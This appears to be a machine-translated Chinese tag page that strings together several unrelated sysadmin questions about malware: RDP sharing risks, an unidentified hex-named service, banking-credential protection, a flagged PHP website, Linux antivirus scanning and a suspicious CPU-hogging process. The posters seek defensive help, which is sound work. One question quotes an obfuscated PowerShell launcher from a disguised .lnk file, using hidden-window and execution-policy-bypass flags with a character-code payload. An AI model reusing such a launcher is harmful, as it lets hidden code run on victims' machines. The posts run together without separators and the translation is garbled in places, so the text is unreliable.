标签: malware

当从启用网络共享的本地 Windows（7 或 XP）PC 通过 RDP 连接到 Windows Server（2003 或 2008）桌面时（通常，本地 C: 磁盘将与远程服务器共享），是否真的有机会病毒感染远程服务器？

当然，我们会尽我们所能保护我们的本地 PC，所以我只想知道制定一项政策来限制文件传输到 FTP 或 WebDAV 并禁止共享是否有意义。

我相信以前应该问过这样的问题，但我真的找不到任何东西。

服务名称是一个 32 位的十六进制数字。它可能是随机生成的，因为对该号码的 Google 搜索没有找到任何内容。它指向一个 EXE 文件，该文件也有一个十六进制数作为名称，在一个也有一个十六进制数作为名称的文件夹中。

我怀疑这可能是某种恶意软件，因为命名看起来很奇怪，但恶意软件扫描没有标记它。它也可能是合法软件，但出于某种原因只是使用了奇怪的名称。

在 EXE 文件属性的详细信息选项卡中，文件描述为空白，但有一个产品版本（“3.13.11.3”）和版权（“Copyright (C) 2014”）对我帮助不大。

问题是：由于文件名没有提供任何线索，我如何确定服务实际是什么程序？

中小型企业面临的风险之一是通过使用键盘记录器或其他恶意软件将您的银行凭据丢失给坏人，正如Bruce Schneier 在博客中所提到的。一个特殊的威胁是《纽约时报》中描述的实时键盘记录器。最重要的是，利用商业银行的登录信息，不法分子可以从您的账户中电汇出钱，而且可能没有追索权。商业银行帐户登录确实是进入王国的钥匙。

我决定大幅提高使用这些银行凭证的机器的安全性。我的标准安全建议是 Windows XP SP3，每晚自动应用补丁。病毒防护已开启（我们通常使用 ESET）。用户是受限用户；他们不能添加软件。软件限制可防止用户意外或故意下载软件并在其用户目录外运行。我们使用 IE8 是因为它易于在 Active Directory 环境中管理，但我认为这是一个潜在的弱点。不幸的是，最可能的零日漏洞利用载体是 flash 或 acrobat，我们都使用这两种方法。

安全始终是方便与安全之间的权衡，因此答案和建议应该有利有弊。我将回答一些建议，以便您了解我的想法。

我已经四处搜索，但到目前为止还没有找到可能的解决方案。我有一个正在进行的扫描，我认为它会在某个时间完成，但不幸的是它没有。所以我想知道是否有办法检查这个正在进行的进度的扫描进度。

我得到了一个.avi乍一看的文件，但后来我发现这实际上是一个.lnk文件，但为时已晚。

该文件的目标元素属性是 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

出发点是： %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

我从以下 ASCII 代码中创建了 String，它似乎是Hallo World!. 这似乎很混乱到我，因为我无法找到NoPr，Wind并eXEc在PowerShell中的文档的任何位置参数，additionaly由于某些原因，文件有700MB的大小，直到我删除.avi从文件描述字段值。

你知道这个文件可以尝试做什么吗？

我的一些朋友有一个网站（www.kennelsoffie.dk），我会在遇到任何麻烦时尽力帮助他们。然而这一次我，想不通。当我使用 Google Chrome 访问该网站时，我看到一个警告页面，声称我尝试访问的页面包含来自 stopsse.info 的元素。

我不会任何 PHP，所以我只是下载了完整的网站，包括数据库的备份（即 .sql 文件）。然后，我在所有文件中搜索了 stopsse，但没有找到任何内容。

我还使用 siteadvisor.com 测试了该站点，它说“我们测试了该站点，但没有发现任何重大问题”。

PHP 是否可以隐藏对恶意软件站点的引用，以便我无法通过简单的搜索找到它？如果是这样，你怎么能找到它？

就像标题一样，有没有我可以从 Linux 上的命令提示符运行的防病毒软件，以确保用户上传的文件没有病毒？

谢谢！

我们的数据中心有基本的服务器端病毒扫描，但它很昂贵，使用大量的 CPU 周期，并且维护起来很烦人。我不是在寻找关于“更好”的 AV 软件的销售宣传，我更在寻找社区的脉搏，看看其他人在他们的数据中心做什么。

这是我们数据中心的快速概览 - 主要是一个 Windows 商店，拥有少量 Web 服务器和大量 SQL Server。在 Web 服务器中，只有少数是面向公众的，并且端口限制非常严格 - 端口 80 和 443。没有一个 SQL Server 是面向公众的。

在“内部”威胁（用户做蠢事）方面，我们对权限非常严格，因此只有极少数公司可以在服务器端安装任何东西。其他所有人都使用网站或客户端工具来访问服务器。

因此，在这种“受保护”的私有数据中心场景中，95% 的用户从客户端工具访问服务器，并且几乎没有公开曝光，是否有充分的理由在我们所有的后台运行 A/V 客户端？终端服务器与否？

我的 centos 服务器现在 CPU 负载很高。请参阅下面的 Htop 输出。

sync_supers 非常可疑，但我不知道如何杀死它。有什么建议？

我有一个 CentOS 服务器为 Windows 用户存储文件。

如何扫描这些文件中的windows病毒，同时防止隔离等措施？

我不希望以任何方式更改文件，并且希望它可以纯粹在命令行中完成并具有可解析的结果。

我们拥有许可证的防病毒软件是 Kaspersky Endpoint Security。这是首选的防病毒软件，但该问题通常适用于 Linux 防病毒软件。